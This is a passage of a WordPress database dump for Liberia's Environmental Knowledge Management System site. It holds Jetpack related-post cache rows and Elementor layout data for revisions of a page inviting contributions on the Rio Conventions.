0237356780aea305\";a:2:{s:7:\"expires\";i:1626054084;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3087;}i:1;a:1:{s:2:\"id\";i:1772;}i:2;a:1:{s:2:\"id\";i:1724;}}}}'),(20120,1606,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629024465;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1596;}i:1;a:1:{s:2:\"id\";i:1604;}i:2;a:1:{s:2:\"id\";i:2964;}}}}'),(20121,485,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627768981;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:477;}i:1;a:1:{s:2:\"id\";i:482;}i:2;a:1:{s:2:\"id\";i:483;}}}}'),(20123,1726,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627861099;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1715;}i:1;a:1:{s:2:\"id\";i:1699;}i:2;a:1:{s:2:\"id\";i:1728;}}}}'),(20124,1697,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628217743;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1707;}i:1;a:1:{s:2:\"id\";i:1699;}i:2;a:1:{s:2:\"id\";i:1741;}}}}'),(20125,472,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628945119;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:473;}i:1;a:1:{s:2:\"id\";i:474;}i:2;a:1:{s:2:\"id\";i:470;}}}}'),(20126,1751,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627466368;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2293;}i:1;a:1:{s:2:\"id\";i:2296;}i:2;a:1:{s:2:\"id\";i:3087;}}}}'),(20128,476,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627845256;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:479;}i:1;a:1:{s:2:\"id\";i:472;}i:2;a:1:{s:2:\"id\";i:477;}}}}'),(20129,1774,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628956711;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1743;}i:1;a:1:{s:2:\"id\";i:1732;}i:2;a:1:{s:2:\"id\";i:3099;}}}}'),(20130,1718,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628803065;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1751;}i:1;a:1:{s:2:\"id\";i:3087;}i:2;a:1:{s:2:\"id\";i:2993;}}}}'),(20131,2150,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627850303;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2751;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:2156;}}}}'),(20133,1722,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628335679;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2751;}i:1;a:1:{s:2:\"id\";i:2152;}i:2;a:1:{s:2:\"id\";i:3087;}}}}'),(20134,1715,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627020324;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1739;}i:1;a:1:{s:2:\"id\";i:1728;}i:2;a:1:{s:2:\"id\";i:1737;}}}}'),(20135,483,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628576153;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:482;}i:1;a:1:{s:2:\"id\";i:477;}i:2;a:1:{s:2:\"id\";i:484;}}}}'),(20136,2165,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628025618;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:1782;}i:2;a:1:{s:2:\"id\";i:2751;}}}}'),(20137,1713,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627629491;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1720;}i:1;a:1:{s:2:\"id\";i:1726;}i:2;a:1:{s:2:\"id\";i:1699;}}}}'),(20139,1604,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629065606;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1544;}i:1;a:1:{s:2:\"id\";i:2457;}i:2;a:1:{s:2:\"id\";i:1588;}}}}'),(20142,1701,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628235375;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1772;}i:1;a:1:{s:2:\"id\";i:3079;}i:2;a:1:{s:2:\"id\";i:3102;}}}}'),(20143,1730,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628289092;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1734;}i:1;a:1:{s:2:\"id\";i:3096;}i:2;a:1:{s:2:\"id\";i:2297;}}}}'),(20144,1592,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629023005;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1544;}i:1;a:1:{s:2:\"id\";i:1600;}i:2;a:1:{s:2:\"id\";i:2704;}}}}'),(20145,1766,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628468471;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1743;}i:1;a:1:{s:2:\"id\";i:570;}i:2;a:1:{s:2:\"id\";i:1774;}}}}'),(20146,1596,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629092459;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1606;}i:1;a:1:{s:2:\"id\";i:1602;}i:2;a:1:{s:2:\"id\";i:1604;}}}}'),(20147,468,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628951978;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:474;}i:1;a:1:{s:2:\"id\";i:470;}i:2;a:1:{s:2:\"id\";i:471;}}}}'),(20148,2951,'_elementor_edit_mode','builder'),(20149,2951,'_elementor_template_type','wp-page'),(20150,2951,'_elementor_version','2.7.5'),(20151,2951,'_wp_page_template','default'),(20152,2951,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> to send us more information!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(20155,2952,'_elementor_edit_mode','builder'),(20156,2952,'_elementor_template_type','wp-page'),(20157,2952,'_elementor_version','2.8.1'),(20158,2952,'_wp_page_template','default'),(20159,2952,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>to send us more information!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(20161,2953,'_elementor_edit_mode','builder'),(20162,2953,'_elementor_template_type','wp-page'),(20163,2953,'_elementor_version','2.8.1'),(20164,2953,'_wp_page_template','default'),(20165,2953,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(20167,2954,'_elementor_edit_mode','builder'),(20168,2954,'_elementor_template_type','wp-page'),(20169,2954,'_elementor_version','2.8.1'),(20170,2954,'_wp_page_template','default'),(20171,2954,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(20172,2954,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}}'),(20174,